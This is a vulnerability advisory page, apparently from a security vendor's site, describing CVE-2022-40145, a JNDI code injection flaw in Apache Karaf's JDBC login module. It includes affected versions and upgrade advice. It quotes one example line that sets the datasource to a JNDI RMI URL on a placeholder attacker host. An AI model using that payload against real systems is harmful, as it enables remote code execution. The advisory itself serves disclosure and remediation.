CVE-2022-40145
Last modified
CVE-2022-40145 is a critical-severity vulnerability rated 9.8/10 on the CVSS scale. This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8. EPSS estimates a 2.40% chance of exploitation in the next 30 days.
Description
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Apache | Karaf | < 4.3.8 |
| Apache | Karaf | >= 4.4.0, < 4.4.2 |
References
- https://karaf.apache.org/security/cve-2022-40145.txtVendor Advisory
- https://karaf.apache.org/security/cve-2022-40145.txtVendor Advisory
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2022-40145?
How severe is CVE-2022-40145?
How do I fix CVE-2022-40145?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2022
- CVE-2022-4014A vulnerability, which was classified as problematic, has be…4.3
- CVE-2022-40140An origin validation error vulnerability in Trend Micro Apex…5.5
- CVE-2022-40141A vulnerability in Trend Micro Apex One and Apex One as a Se…7.5
- CVE-2022-40142A security link following local privilege escalation vulnera…7.8
- CVE-2022-40143A link following local privilege escalation vulnerability in…7.3
- CVE-2022-40144A vulnerability in Trend Micro Apex One and Trend Micro Apex…9.8
- CVE-2022-40146Server-Side Request Forgery (SSRF) vulnerability in Batik of…7.5
- CVE-2022-40147A vulnerability has been identified in Industrial Edge Manag…7.4
- CVE-2022-40148Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultID…
- CVE-2022-40149Those using Jettison to parse untrusted XML or JSON data may…7.5
- CVE-2022-4015A vulnerability, which was classified as critical, was found…9.8
- CVE-2022-40150Those using Jettison to parse untrusted XML or JSON data may…7.5
Are you affected by CVE-2022-40145?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
